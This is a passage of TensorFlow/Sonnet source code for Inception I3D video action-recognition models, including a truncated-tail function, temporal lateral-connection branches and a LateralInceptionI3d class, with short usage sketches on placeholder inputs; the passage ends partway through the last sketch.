branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*384, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*384, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*48, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Logits'
with tf.variable_scope(end_point):
net = tf.nn.avg_pool3d(net, ksize=[1, 2, 7, 7, 1],
strides=[1, 1, 1, 1, 1], padding=snt.VALID)
net = tf.nn.dropout(net, dropout_keep_prob)
logits = Unit3D(output_channels=self._num_classes,
kernel_shape=[1, 1, 1],
activation_fn=None,
use_batch_norm=False,
use_bias=True,
name='Conv3d_0c_1x1')(net, is_training=is_training)
if self._spatial_squeeze:
logits = tf.squeeze(logits, [2, 3], name='SpatialSqueeze')
averaged_logits = tf.reduce_mean(logits, axis=1)
end_points[end_point] = averaged_logits
if self._final_endpoint == end_point: return averaged_logits, end_points
end_point = 'Predictions'
predictions = tf.nn.softmax(averaged_logits)
end_points[end_point] = predictions
return predictions, end_points
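
# --- Illustrative usage sketch (not part of the original module) ---
# End-to-end construction of the InceptionI3d graph on a dummy clip. The
# 64-frame, 224x224 placeholder and the 400-class head follow the docstring
# defaults; `channel_mult=1` is passed explicitly so every conv keeps an
# integer channel count.
def _inception_i3d_usage_example():
    """Builds the full I3D graph up to 'Logits' on a dummy input (sketch)."""
    rgb_input = tf.placeholder(tf.float32, shape=[1, 64, 224, 224, 3])
    model = InceptionI3d(num_classes=400, final_endpoint='Logits')
    # `logits` has shape [1, 400]; `end_points` maps endpoint names such as
    # 'Mixed_4f' or 'Mixed_5c' to their feature tensors.
    logits, end_points = model(rgb_input, is_training=False,
                               dropout_keep_prob=1.0, channel_mult=1)
    return logits, end_points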
###################################### tail ######################################
def Unit_custom_3D(output_channels,
kernel_shape=(1, 1, 1),
stride=(1, 1, 1),
activation_fn=tf.nn.relu,
use_batch_norm=True,  # set to False (together with use_bias=True) for the no-BatchNorm variant
use_bias=False,
name='unit_3d'):
return Unit3D(output_channels,
kernel_shape,
stride,
activation_fn,
use_batch_norm,
use_bias,
name)
def i3d_tail(input_feats, is_training, final_endpoint, channel_mult=1.0):
net = input_feats
end_points = {}
# end_point = 'Mixed_4f'
# with tf.variable_scope(end_point):
# with tf.variable_scope('Branch_0'):
# branch_0 = Unit_custom_3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
# name='Conv3d_0a_1x1')(net, is_training=is_training)
# with tf.variable_scope('Branch_1'):
# branch_1 = Unit_custom_3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
# name='Conv3d_0a_1x1')(net, is_training=is_training)
# branch_1 = Unit_custom_3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
# name='Conv3d_0b_3x3')(branch_1,
# is_training=is_training)
# with tf.variable_scope('Branch_2'):
# branch_2 = Unit_custom_3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
# name='Conv3d_0a_1x1')(net, is_training=is_training)
# branch_2 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
# name='Conv3d_0b_3x3')(branch_2,
# is_training=is_training)
# with tf.variable_scope('Branch_3'):
# branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
# strides=[1, 1, 1, 1, 1], padding=snt.SAME,
# name='MaxPool3d_0a_3x3')
# branch_3 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
# name='Conv3d_0b_1x1')(branch_3,
# is_training=is_training)
# net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
# end_points[end_point] = net
# # if self._final_endpoint == end_point: return net, end_points
# if final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_5a_2x2'
net = tf.nn.max_pool3d(net, ksize=[1, 2, 2, 2, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
# if self._final_endpoint == end_point: return net, end_points
if final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit_custom_3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit_custom_3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit_custom_3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit_custom_3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0a_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
# if self._final_endpoint == end_point: return net, end_points
if final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit_custom_3D(output_channels=channel_mult*384, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit_custom_3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit_custom_3D(output_channels=channel_mult*384, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit_custom_3D(output_channels=channel_mult*48, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit_custom_3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
# if self._final_endpoint == end_point: return net, end_points
if final_endpoint == end_point: return net, end_points
return net, end_points
# end_point = 'Logits'
# with tf.variable_scope(end_point):
# net = tf.nn.avg_pool3d(net, ksize=[1, 2, 7, 7, 1],
# strides=[1, 1, 1, 1, 1], padding=snt.VALID)
# net = tf.nn.dropout(net, dropout_keep_prob)
# logits = Unit3D(output_channels=self._num_classes,
# kernel_shape=[1, 1, 1],
# activation_fn=None,
# use_batch_norm=False,
# use_bias=True,
# name='Conv3d_0c_1x1')(net, is_training=is_training)
# if self._spatial_squeeze:
# logits = tf.squeeze(logits, [2, 3], name='SpatialSqueeze')
# averaged_logits = tf.reduce_mean(logits, axis=1)
# end_points[end_point] = averaged_logits
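
# --- Illustrative usage sketch (not part of the original module) ---
# Drives i3d_tail from pre-computed mid-level features, e.g. activations shaped
# like the 'Mixed_4f' endpoint of a frozen I3D head. The [1, 8, 14, 14, 832]
# placeholder is an assumption for illustration, not a value taken from the
# original training configuration.
def _i3d_tail_usage_example():
    """Runs the Mixed_5b/Mixed_5c tail on dummy head features (sketch)."""
    head_feats = tf.placeholder(tf.float32, shape=[1, 8, 14, 14, 832])
    tail_out, tail_end_points = i3d_tail(head_feats, is_training=False,
                                         final_endpoint='Mixed_5c',
                                         channel_mult=1)
    # MaxPool3d_5a_2x2 halves time and space, and Mixed_5c concatenates
    # 384 + 384 + 128 + 128 channels, so tail_out is [1, 4, 7, 7, 1024].
    return tail_out, tail_end_points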
############################ Lateral Connections for temporal context
def lateralconnection(inputs, t_span, output_channels, kernel_shape, stride, is_training, name):
    """Builds one lateral branch that summarises temporal context.

    The input is subsampled down to `t_span` frames, passed through a 3D conv,
    and max-pooled over time, so the branch returns a single temporal slice that
    can be broadcast-added to the main pathway. The frame count must be known
    statically and be divisible by `t_span`.
    """
    # Use static shapes so the Python-level subsampling step is a plain int.
    _, T, _, _, _ = inputs.get_shape().as_list()
    subsampling_step = T // t_span
    sub_in = inputs[:, ::subsampling_step]
    # temporal_context = Unit3D(output_channels, kernel_shape, stride, name)(sub_in, is_training=is_training)
    with tf.variable_scope(name):
        temporal_context = snt.Conv3D(output_channels=output_channels,
                                      kernel_shape=kernel_shape,
                                      stride=stride,
                                      padding=snt.SAME,
                                      use_bias=True)(sub_in)
    # temporal_context = tf.layers.conv3d(sub_in, filters=output_channels, kernel_size=kernel_shape, strides=stride, padding='SAME', activation=tf.nn.relu, name=name)
    pooled_context = tf.nn.max_pool3d(temporal_context, ksize=[1, t_span, 1, 1, 1],
                                      strides=[1, t_span, 1, 1, 1], padding='VALID',
                                      name=name + 'pooling')
    return pooled_context
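
# --- Illustrative shape walk-through (not part of the original module) ---
# The numbers below are assumptions chosen so the frame count divides evenly
# by t_span; they are not taken from the original training setup.
def _lateralconnection_usage_example():
    """Builds one lateral branch on a dummy feature map (sketch)."""
    # 16 frames subsampled every 4th frame -> 4 frames enter the conv, then the
    # temporal max-pool over t_span collapses them to a single frame.
    feats = tf.placeholder(tf.float32, shape=[2, 16, 56, 56, 64])
    context = lateralconnection(feats, t_span=4, output_channels=64,
                                kernel_shape=[1, 3, 3], stride=[1, 1, 1],
                                is_training=False, name='lateral_example')
    # `context` has shape [2, 1, 56, 56, 64] and can be broadcast-added to a
    # pathway that still has a temporal dimension.
    return context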
class LateralInceptionI3d(snt.AbstractModule):
"""Inception-v1 I3D architecture.
The model is introduced in:
Quo Vadis, Action Recognition? A New Model and the Kinetics Dataset
Joao Carreira, Andrew Zisserman
https://arxiv.org/pdf/1705.07750v1.pdf.
See also the Inception architecture, introduced in:
Going deeper with convolutions
Christian Szegedy, Wei Liu, Yangqing Jia, Pierre Sermanet, Scott Reed,
Dragomir Anguelov, Dumitru Erhan, Vincent Vanhoucke, Andrew Rabinovich.
http://arxiv.org/pdf/1409.4842v1.pdf.
"""
# Endpoints of the model in order. During construction, all the endpoints up
# to a designated `final_endpoint` are returned in a dictionary as the
# second return value.
VALID_ENDPOINTS = (
'Conv3d_1a_7x7',
'MaxPool3d_2a_3x3',
'Conv3d_2b_1x1',
'Conv3d_2c_3x3',
'MaxPool3d_3a_3x3',
'Mixed_3b',
'Mixed_3c',
'MaxPool3d_4a_3x3',
'Mixed_4b',
'Mixed_4c',
'Mixed_4d',
'Mixed_4e',
'Mixed_4f',
'MaxPool3d_5a_2x2',
'Mixed_5b',
'Mixed_5c',
'Logits',
'Predictions',
)
def __init__(self, num_classes=400, spatial_squeeze=True,
final_endpoint='Logits', name='inception_i3d'):
"""Initializes I3D model instance.
Args:
num_classes: The number of outputs in the logit layer (default 400, which
matches the Kinetics dataset).
spatial_squeeze: Whether to squeeze the spatial dimensions for the logits
before returning (default True).
final_endpoint: The model contains many possible endpoints.
`final_endpoint` specifies the last endpoint for the model to be built
up to. In addition to the output at `final_endpoint`, all the outputs
at endpoints up to `final_endpoint` will also be returned, in a
dictionary. `final_endpoint` must be one of
InceptionI3d.VALID_ENDPOINTS (default 'Logits').
name: A string (optional). The name of this module.
Raises:
ValueError: if `final_endpoint` is not recognized.
"""
if final_endpoint not in self.VALID_ENDPOINTS:
raise ValueError('Unknown final endpoint %s' % final_endpoint)
super(LateralInceptionI3d, self).__init__(name=name)
self._num_classes = num_classes
self._spatial_squeeze = spatial_squeeze
self._final_endpoint = final_endpoint
def _build(self, inputs, is_training, dropout_keep_prob=1.0, channel_mult=1.0):
"""Connects the model to inputs.
Args:
inputs: Inputs to the model, which should have dimensions
`batch_size` x `num_frames` x 224 x 224 x `num_channels`.
is_training: whether to use training mode for snt.BatchNorm (boolean).
dropout_keep_prob: Probability of keeping a unit in the tf.nn.dropout
layer (float in (0, 1]; 1.0 disables dropout).
channel_mult: Multiplier applied to the number of output channels of
every convolution (default 1.0; keep it integer-valued so the channel
counts stay integral).
Returns:
A tuple consisting of:
1. Network output at location `self._final_endpoint`.
2. Dictionary containing all endpoints up to `self._final_endpoint`,
indexed by endpoint name.
Raises:
ValueError: if `self._final_endpoint` is not recognized.
"""
if self._final_endpoint not in self.VALID_ENDPOINTS:
raise ValueError('Unknown final endpoint %s' % self._final_endpoint)
net = inputs
end_points = {}
end_point = 'Conv3d_1a_7x7'
prev = net ###
net = Unit3D(output_channels=channel_mult*64, kernel_shape=[7, 7, 7],
stride=[2, 2, 2], name=end_point)(net, is_training=is_training)
lat = lateralconnection(prev, 4, 64, [1,7,7], [1,2,2], is_training, 'lateral1') ###
net = net + lat ###
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_2a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 1, 3, 3, 1], strides=[1, 1, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Conv3d_2b_1x1'
prev = net ###
net = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name=end_point)(net, is_training=is_training)
lat = lateralconnection(prev, 4, 64, [1,1,1], [1,1,1], is_training, 'lateral2') ###
net = net + lat ###
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Conv3d_2c_3x3'
prev = net ###
net = Unit3D(output_channels=channel_mult*192, kernel_shape=[3, 3, 3],
name=end_point)(net, is_training=is_training)
lat = lateralconnection(prev, 4, 192, [3,3,3], [1,1,1], is_training, 'lateral3') ###
net = net + lat ###
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_3a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 1, 3, 3, 1], strides=[1, 1, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_3b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*96, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*16, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_3c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*192, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*96, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_4a_3x3'
net = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*96, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*208, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*16, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*48, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*112, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*224, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*24, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4d'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*256, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*24, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4e'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*112, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*144, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*288, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*64, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*64, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_4f'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'MaxPool3d_5a_2x2'
net = tf.nn.max_pool3d(net, ksize=[1, 2, 2, 2, 1], strides=[1, 2, 2, 2, 1],
padding=snt.SAME, name=end_point)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5b'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*256, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*160, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*320, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*32, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0a_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Mixed_5c'
with tf.variable_scope(end_point):
with tf.variable_scope('Branch_0'):
branch_0 = Unit3D(output_channels=channel_mult*384, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
with tf.variable_scope('Branch_1'):
branch_1 = Unit3D(output_channels=channel_mult*192, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_1 = Unit3D(output_channels=channel_mult*384, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_1,
is_training=is_training)
with tf.variable_scope('Branch_2'):
branch_2 = Unit3D(output_channels=channel_mult*48, kernel_shape=[1, 1, 1],
name='Conv3d_0a_1x1')(net, is_training=is_training)
branch_2 = Unit3D(output_channels=channel_mult*128, kernel_shape=[3, 3, 3],
name='Conv3d_0b_3x3')(branch_2,
is_training=is_training)
with tf.variable_scope('Branch_3'):
branch_3 = tf.nn.max_pool3d(net, ksize=[1, 3, 3, 3, 1],
strides=[1, 1, 1, 1, 1], padding=snt.SAME,
name='MaxPool3d_0a_3x3')
branch_3 = Unit3D(output_channels=channel_mult*128, kernel_shape=[1, 1, 1],
name='Conv3d_0b_1x1')(branch_3,
is_training=is_training)
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 4)
end_points[end_point] = net
if self._final_endpoint == end_point: return net, end_points
end_point = 'Logits'
with tf.variable_scope(end_point):
net = tf.nn.avg_pool3d(net, ksize=[1, 2, 7, 7, 1],
strides=[1, 1, 1, 1, 1], padding=snt.VALID)
net = tf.nn.dropout(net, dropout_keep_prob)
logits = Unit3D(output_channels=self._num_classes,
kernel_shape=[1, 1, 1],
activation_fn=None,
use_batch_norm=False,
use_bias=True,
name='Conv3d_0c_1x1')(net, is_training=is_training)
if self._spatial_squeeze:
logits = tf.squeeze(logits, [2, 3], name='SpatialSqueeze')
averaged_logits = tf.reduce_mean(logits, axis=1)
end_points[end_point] = averaged_logits
if self._final_endpoint == end_point: return averaged_logits, end_points
end_point = 'Predictions'
predictions = tf.nn.softmax(averaged_logits)
end_points[end_point] = predictions
return predictions, end_points
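
# --- Illustrative usage sketch (not part of the original module) ---
# The 16-frame clip length is an assumption chosen so that each lateral branch
# pools down to a single temporal frame, which then broadcasts when added to
# the main pathway; it is not taken from the original training setup.
def _lateral_inception_i3d_usage_example():
    """Builds the LateralInceptionI3d graph on a dummy 16-frame clip (sketch)."""
    rgb_input = tf.placeholder(tf.float32, shape=[1, 16, 224, 224, 3])
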